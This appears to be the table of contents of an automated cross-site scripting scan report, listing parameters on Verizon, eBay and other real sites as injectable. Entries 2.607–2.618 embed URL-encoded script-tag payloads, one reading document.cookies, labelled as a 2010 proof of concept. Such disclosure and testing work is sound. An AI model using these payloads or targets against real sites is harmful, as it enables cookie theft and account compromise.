2.515. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [popzipcode parameter]

2.516. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [prizm parameter]

2.517. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [pts parameter]

2.518. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [pws parameter]

2.519. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [search parameter]

2.520. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [sec_email parameter]

2.521. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [smb_enh_msg parameter]

2.522. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [smb_premmail parameter]

2.523. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [usertype parameter]

2.524. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [vasonly parameter]

2.525. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [vec parameter]

2.526. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [vgodfamily parameter]

2.527. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [vgodunlim parameter]

2.528. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [viss parameter]

2.529. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [vsbb parameter]

2.530. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [webex parameter]

2.531. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [webhosting parameter]

2.532. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [REST URL parameter 4]

2.533. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [REST URL parameter 5]

2.534. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [REST URL parameter 6]

2.535. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [REST URL parameter 6]

2.536. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [audio_conf parameter]

2.537. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [bbaw parameter]

2.538. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [connex parameter]

2.539. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [fiostvown parameter]

2.540. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [fiosvoice parameter]

2.541. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [msp parameter]

2.542. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [name of an arbitrarily supplied request parameter]

2.543. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [npa parameter]

2.544. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [nxx parameter]

2.545. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [online_backup parameter]

2.546. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [partner parameter]

2.547. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [popcity parameter]

2.548. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [popcounty parameter]

2.549. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [popdma parameter]

2.550. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [popindicator parameter]

2.551. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [popip parameter]

2.552. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [popservice parameter]

2.553. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [popstate parameter]

2.554. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [popzipcode parameter]

2.555. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [prizm parameter]

2.556. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [pts parameter]

2.557. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [pws parameter]

2.558. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [search parameter]

2.559. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [sec_email parameter]

2.560. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [smb_enh_msg parameter]

2.561. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [smb_premmail parameter]

2.562. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [usertype parameter]

2.563. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [vasonly parameter]

2.564. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [vgodfamily parameter]

2.565. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [vgodunlim parameter]

2.566. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [viss parameter]

2.567. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [webex parameter]

2.568. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [webhosting parameter]

2.569. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 4]

2.570. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 5]

2.571. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 6]

2.572. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 6]

2.573. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 6]

2.574. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [audio_conf parameter]

2.575. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [bbaw parameter]

2.576. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [connex parameter]

2.577. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [fiostvown parameter]

2.578. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [fiosvoice parameter]

2.579. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [msp parameter]

2.580. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [name of an arbitrarily supplied request parameter]

2.581. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [npa parameter]

2.582. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [nxx parameter]

2.583. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [online_backup parameter]

2.584. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [partner parameter]

2.585. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popcity parameter]

2.586. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popcounty parameter]

2.587. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popdma parameter]

2.588. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popindicator parameter]

2.589. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popip parameter]

2.590. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popservice parameter]

2.591. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popstate parameter]

2.592. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popzipcode parameter]

2.593. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [prizm parameter]

2.594. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [pts parameter]

2.595. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [pws parameter]

2.596. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [search parameter]

2.597. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [sec_email parameter]

2.598. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [smb_enh_msg parameter]

2.599. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [smb_premmail parameter]

2.600. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [usertype parameter]

2.601. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [vasonly parameter]

2.602. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [vgodfamily parameter]

2.603. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [vgodunlim parameter]

2.604. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [viss parameter]

2.605. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [webex parameter]

2.606. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [webhosting parameter]

2.607. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top [REST URL parameter 4]

2.608. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top [REST URL parameter 4]

2.609. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top [REST URL parameter 5]

2.610. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top [REST URL parameter 5]

2.611. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top [REST URL parameter 6]

2.612. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top [REST URL parameter 7]

2.613. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(document.cookies)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top [REST URL parameter 4]

2.614. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(document.cookies)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top [REST URL parameter 4]

2.615. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(document.cookies)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top [REST URL parameter 5]

2.616. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(document.cookies)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top [REST URL parameter 5]

2.617. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(document.cookies)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top [REST URL parameter 6]

2.618. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(document.cookies)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top [REST URL parameter 7]

2.619. http://publish.flashapi.vx.roo.com/16359446-8e33-4088-821a-293e3bfd9acd-174406/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]

2.620. http://publish.flashapi.vx.roo.com/16359446-8e33-4088-821a-293e3bfd9acd-174406/ChannelInfoService.aspx [siteid parameter]

2.621. http://publish.flashapi.vx.roo.com/16359446-8e33-4088-821a-293e3bfd9acd-174406/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]

2.622. http://publish.flashapi.vx.roo.com/16359446-8e33-4088-821a-293e3bfd9acd-174406/PlaylistInfoService.aspx [siteid parameter]

2.623. http://publish.flashapi.vx.roo.com/16359446-8e33-4088-821a-293e3bfd9acd-174407/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]

2.624. http://publish.flashapi.vx.roo.com/16359446-8e33-4088-821a-293e3bfd9acd-174407/ChannelInfoService.aspx [siteid parameter]

2.625. http://publish.flashapi.vx.roo.com/16359446-8e33-4088-821a-293e3bfd9acd-174407/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]

2.626. http://publish.flashapi.vx.roo.com/16359446-8e33-4088-821a-293e3bfd9acd-174407/PlaylistInfoService.aspx [siteid parameter]

2.627. http://publish.flashapi.vx.roo.com/8dbfb0ba-4add-46fb-a53d-245440ef71a4-202995/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]

2.628. http://publish.flashapi.vx.roo.com/8dbfb0ba-4add-46fb-a53d-245440ef71a4-202995/ChannelInfoService.aspx [siteid parameter]

2.629. http://publish.flashapi.vx.roo.com/8dbfb0ba-4add-46fb-a53d-245440ef71a4-202995/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]

2.630. http://publish.flashapi.vx.roo.com/8dbfb0ba-4add-46fb-a53d-245440ef71a4-202995/PlaylistInfoService.aspx [siteid parameter]

2.631. http://publish.flashapi.vx.roo.com/a437cd50-7db7-4848-a974-e35c55c6dcca-203031/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]

2.632. http://publish.flashapi.vx.roo.com/a437cd50-7db7-4848-a974-e35c55c6dcca-203031/ChannelInfoService.aspx [siteid parameter]

2.633. http://publish.flashapi.vx.roo.com/a437cd50-7db7-4848-a974-e35c55c6dcca-203031/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]

2.634. http://publish.flashapi.vx.roo.com/a437cd50-7db7-4848-a974-e35c55c6dcca-203031/PlaylistInfoService.aspx [siteid parameter]

2.635. http://publish.flashapi.vx.roo.com/e7257f85-714e-4527-a4b4-7767aa0fa098-104147/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]

2.636. http://publish.flashapi.vx.roo.com/e7257f85-714e-4527-a4b4-7767aa0fa098-104147/ChannelInfoService.aspx [siteid parameter]

2.637. http://publish.flashapi.vx.roo.com/e7257f85-714e-4527-a4b4-7767aa0fa098-104147/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]

2.638. http://publish.flashapi.vx.roo.com/e7257f85-714e-4527-a4b4-7767aa0fa098-104147/PlaylistInfoService.aspx [siteid parameter]

2.639. http://rover.ebay.com/ar/1/73255/4 [mpvc parameter]

2.640. http://rover.ebay.com/ar/1/73255/4 [name of an arbitrarily supplied request parameter]

2.641. http://rover.ebay.com/ar/1/73683/4 [mpvc parameter]

2.642. http://rover.ebay.com/ar/1/73683/4 [mpvc parameter]

2.643. http://rover.ebay.com/ar/1/73683/4 [name of an arbitrarily supplied request parameter]

2.644. http://rover.ebay.com/ar/1/73683/4 [name of an arbitrarily supplied request parameter]

2.645. http://syndicate.verizon.com/ads/scripthandler.ashx [source parameter]

2.646. http://syndicate.verizon.net/ads/js.ashx [page parameter]

2.647. http://syndicate.verizon.net/ads/js.ashx [pos parameter]

2.648. http://syndicate.verizon.net/ads/scripthandler.ashx [source parameter]

2.649. http://redcated/APM/iview/273561243/direct [click parameter]

2.650. http://redcated/APM/iview/273561243/direct [name of an arbitrarily supplied request parameter]

2.651. http://redcated/APM/iview/273561243/direct [name of an arbitrarily supplied request parameter]

2.652. http://redcated/APM/iview/yhxxxdrv0010001133apm/direct [REST URL parameter 4]

2.653. http://redcated/APM/iview/yhxxxdrv0010001133apm/direct [click parameter]

2.654. http://redcated/APM/iview/yhxxxdrv0010001133apm/direct [click parameter]

2.655. http://redcated/APM/iview/yhxxxdrv0010001133apm/direct [name of an arbitrarily supplied request parameter]

2.656. http://redcated/APM/iview/yhxxxdrv0010001133apm/direct [name of an arbitrarily supplied request parameter]

2.657. http://redcated/APM/iview/yhxxxdrv0010001133apm/direct [name of an arbitrarily supplied request parameter]

2.658. http://redcated/APM/iview/yhxxxdrv0010001133apm/direct [name of an arbitrarily supplied request parameter]

2.659. http://redcated/APM/iview/yhxxxdrv0010001133apm/direct [name of an arbitrarily supplied request parameter]

2.660. http://redcated/AVE/iview/266925773/direct [REST URL parameter 4]

2.661. http://redcated/AVE/iview/266925773/direct [name of an arbitrarily supplied request parameter]

2.662. http://redcated/AVE/iview/266925773/direct [name of an arbitrarily supplied request parameter]

2.663. http://redcated/AVE/iview/266925773/direct [name of an arbitrarily supplied request parameter]

2.664. http://redcated/AVE/iview/266925773/direct [wi.120;hi.600/01/6802161163?click parameter]

2.665. http://redcated/AVE/iview/266925773/direct [wi.120;hi.600/01/6802161163?click parameter]

2.666. http://redcated/AVE/iview/266925773/direct [wi.120;hi.600/01/6802161163?click parameter]

2.667. http://redcated/CNT/iview/194067507/direct [REST URL parameter 4]

2.668. http://redcated/CNT/iview/194067507/direct [name of an arbitrarily supplied request parameter]

2.669. http://redcated/CNT/iview/194067507/direct [name of an arbitrarily supplied request parameter]

2.670. http://redcated/CNT/iview/194067507/direct [name of an arbitrarily supplied request parameter]

2.671. http://redcated/CNT/iview/194067507/direct [wi.300;hi.250/01?click parameter]

2.672. http://redcated/CNT/iview/194067507/direct [wi.300;hi.250/01?click parameter]

2.673. http://redcated/CNT/iview/194067507/direct [wi.300;hi.250/01?click parameter]

2.674. http://redcated/CNT/iview/194067513/direct [REST URL parameter 4]

2.675. http://redcated/CNT/iview/194067513/direct [name of an arbitrarily supplied request parameter]

2.676. http://redcated/CNT/iview/194067513/direct [name of an arbitrarily supplied request parameter]

2.677. http://redcated/CNT/iview/194067513/direct [name of an arbitrarily supplied request parameter]

2.678. http://redcated/CNT/iview/194067513/direct [wi.300;hi.250/01?click parameter]

2.679. http://redcated/CNT/iview/194067513/direct [wi.300;hi.250/01?click parameter]

2.680. http://redcated/CNT/iview/194067513/direct [wi.300;hi.250/01?click parameter]

2.681. http://redcated/CNT/iview/244975246/direct [REST URL parameter 4]

2.682. http://redcated/CNT/iview/244975246/direct [name of an arbitrarily supplied request parameter]

2.683. http://redcated/CNT/iview/244975246/direct [name of an arbitrarily supplied request parameter]

2.684. http://redcated/CNT/iview/244975246/direct [name of an arbitrarily supplied request parameter]

2.685. http://redcated/CNT/iview/244975246/direct [wi.300;hi.250/01/3612368145?click parameter]

2.686. http://redcated/CNT/iview/244975246/direct [wi.300;hi.250/01/3612368145?click parameter]

2.687. http://redcated/CNT/iview/244975246/direct [wi.300;hi.250/01/3612368145?click parameter]

2.688. http://redcated/CNT/iview/245130801/direct [REST URL parameter 4]

2.689. http://redcated/CNT/iview/245130801/direct [name of an arbitrarily supplied request parameter]

2.690. http://redcated/CNT/iview/245130801/direct [name of an arbitrarily supplied request parameter]

2.691. http://redcated/CNT/iview/245130801/direct [name of an arbitrarily supplied request parameter]

2.692. http://redcated/CNT/iview/245130801/direct [wi.300;hi.250/01/7298457204586544128?click parameter]

2.693. http://redcated/CNT/iview/245130801/direct [wi.300;hi.250/01/7298457204586544128?click parameter]

2.694. http://redcated/CNT/iview/245130801/direct [wi.300;hi.250/01/7298457204586544128?click parameter]

2.695. http://redcated/CNT/iview/262688153/direct [REST URL parameter 4]

2.696. http://redcated/CNT/iview/262688153/direct [name of an arbitrarily supplied request parameter]

2.697. http://redcated/CNT/iview/262688153/direct [name of an arbitrarily supplied request parameter]

2.698. http://redcated/CNT/iview/262688153/direct [name of an arbitrarily supplied request parameter]

2.699. http://redcated/CNT/iview/262688153/direct [wi.300;hi.250/01/5540470670496712704?click parameter]

2.700. http://redcated/CNT/iview/262688153/direct [wi.300;hi.250/01/5540470670496712704?click parameter]

2.701. http://redcated/CNT/iview/262688153/direct [wi.300;hi.250/01/5540470670496712704?click parameter]

2.702. http://redcated/CNT/iview/276779679/direct [REST URL parameter 4]

2.703. http://redcated/CNT/iview/276779679/direct [name of an arbitrarily supplied request parameter]

2.704. http://redcated/CNT/iview/276779679/direct [name of an arbitrarily supplied request parameter]

2.705. http://redcated/CNT/iview/276779679/direct [wi.728;hi.90/01/207125146?click parameter]

2.706. http://redcated/CNT/iview/276779679/direct [wi.728;hi.90/01/207125146?click parameter]

2.707. http://redcated/CNT/iview/276779681/direct [REST URL parameter 4]

2.708. http://redcated/CNT/iview/276779681/direct [name of an arbitrarily supplied request parameter]

2.709. http://redcated/CNT/iview/276779681/direct [name of an arbitrarily supplied request parameter]

2.710. http://redcated/CNT/iview/276779681/direct [wi.300;hi.250/01/207123317?click parameter]

2.711. http://redcated/CNT/iview/276779681/direct [wi.300;hi.250/01/207123317?click parameter]

2.712. http://redcated/CNT/iview/276779681/direct [wi.300;hi.250/01/207127617?click parameter]

2.713. http://redcated/CNT/iview/276779681/direct [wi.300;hi.250/01/207127617?click parameter]

2.714. http://redcated/D21/iview/164326682/direct [REST URL parameter 4]

2.715. http://redcated/D21/iview/164326682/direct [name of an arbitrarily supplied request parameter]

2.716. http://redcated/D21/iview/164326682/direct [name of an arbitrarily supplied request parameter]

2.717. http://redcated/D21/iview/164326682/direct [name of an arbitrarily supplied request parameter]

2.718. http://redcated/D21/iview/164326682/direct [wi.300;hi.250/01/8450819519?click parameter]

2.719. http://redcated/D21/iview/164326682/direct [wi.300;hi.250/01/8450819519?click parameter]

2.720. http://redcated/D21/iview/164327256/direct [name of an arbitrarily supplied request parameter]

2.721. http://redcated/D21/iview/164327256/direct [name of an arbitrarily supplied request parameter]

2.722. http://redcated/D21/iview/164327256/direct [wi.728;hi.90/01/8450819519?click parameter]

2.723. http://redcated/D21/iview/164327256/direct [wi.728;hi.90/01/8450819519?click parameter]

2.724. http://redcated/D21/iview/170469798/direct [REST URL parameter 4]

2.725. http://redcated/D21/iview/170469798/direct [name of an arbitrarily supplied request parameter]

2.726. http://redcated/D21/iview/170469798/direct [name of an arbitrarily supplied request parameter]

2.727. http://redcated/D21/iview/170469798/direct [name of an arbitrarily supplied request parameter]

2.728. http://redcated/D21/iview/170469798/direct [wi.300;hi.250/01/5979345757?click parameter]

2.729. http://redcated/DEN/iview/249686683/direct/01/207115393 [REST URL parameter 4]

2.730. http://redcated/DEN/iview/249686683/direct/01/207115393 [click parameter]

2.731. http://redcated/DEN/iview/249686683/direct/01/207115393 [click parameter]

2.732. http://redcated/DEN/iview/249686683/direct/01/207115393 [name of an arbitrarily supplied request parameter]

2.733. http://redcated/DEN/iview/249686683/direct/01/207115393 [name of an arbitrarily supplied request parameter]

2.734. http://redcated/DEN/iview/249686747/direct/01/207115013 [REST URL parameter 4]

2.735. http://redcated/DEN/iview/249686747/direct/01/207115013 [click parameter]

2.736. http://redcated/DEN/iview/249686747/direct/01/207115013 [click parameter]

2.737. http://redcated/DEN/iview/249686747/direct/01/207115013 [name of an arbitrarily supplied request parameter]

2.738. http://redcated/DEN/iview/249686747/direct/01/207115013 [name of an arbitrarily supplied request parameter]

2.739. http://redcated/M0N/iview/266207224/direct [REST URL parameter 4]

2.740. http://redcated/M0N/iview/266207224/direct [name of an arbitrarily supplied request parameter]

2.741. http://redcated/M0N/iview/266207224/direct [name of an arbitrarily supplied request parameter]

2.742. http://redcated/M0N/iview/266207224/direct [name of an arbitrarily supplied request parameter]

2.743. http://redcated/M0N/iview/266207224/direct [wi.160;hi.600/01?click parameter]

2.744. http://redcated/M0N/iview/266207224/direct [wi.160;hi.600/01?click parameter]

2.745. http://redcated/NYC/iview/194153896/direct [REST URL parameter 4]

2.746. http://redcated/NYC/iview/194153896/direct [name of an arbitrarily supplied request parameter]

2.747. http://redcated/NYC/iview/194153896/direct [name of an arbitrarily supplied request parameter]

2.748. http://redcated/NYC/iview/194153896/direct [name of an arbitrarily supplied request parameter]

2.749. http://redcated/NYC/iview/194153896/direct [wi.120;hi.600/01/3642846207?click parameter]

2.750. http://redcated/NYC/iview/194153896/direct [wi.120;hi.600/01/3642846207?click parameter]

2.751. http://redcated/NYC/iview/194153896/direct [wi.120;hi.600/01/3642846207?click parameter]

2.752. http://redcated/NYC/iview/266460891/direct [REST URL parameter 4]

2.753. http://redcated/NYC/iview/266460891/direct [wi.180;hi.150/01/6646870380?click parameter]

2.754. http://redcated/NYC/iview/266460891/direct [wi.180;hi.150/01/6646870380?click parameter]

2.755. http://redcated/NYC/iview/266460891/direct [wi.180;hi.150/01/6646870380?click parameter]

2.756. http://redcated/NYC/iview/266847915/direct/01/4766470702 [click parameter]

2.757. http://redcated/NYC/iview/266847915/direct/01/4766470702 [name of an arbitrarily supplied request parameter]

2.758. http://wapp.verizon.net/bookmarks/bmredirex.asp [WT.ti parameter]

2.759. http://wapp.verizon.net/bookmarks/bmredirex.asp [channel parameter]

2.760. http://wapp.verizon.net/bookmarks/bmredirex.asp [clientid parameter]

2.761. http://wapp.verizon.net/bookmarks/bmredirex.asp [name of an arbitrarily supplied request parameter]

2.762. http://wapp.verizon.net/bookmarks/bmredirex.asp [q parameter]

2.763. http://wapp.verizon.net/bookmarks/bmredirex.asp [web_search_type parameter]

2.764. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [WT.ti parameter]

2.765. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [channel parameter]

2.766. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [clientid parameter]

2.767. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [name of an arbitrarily supplied request parameter]

2.768. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [q parameter]

2.769. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [web_search_type parameter]

2.770. http://www.theglobeandmail.com//site-search/ [q parameter]

2.771. http://www.theglobeandmail.com//site-search/ [q parameter]

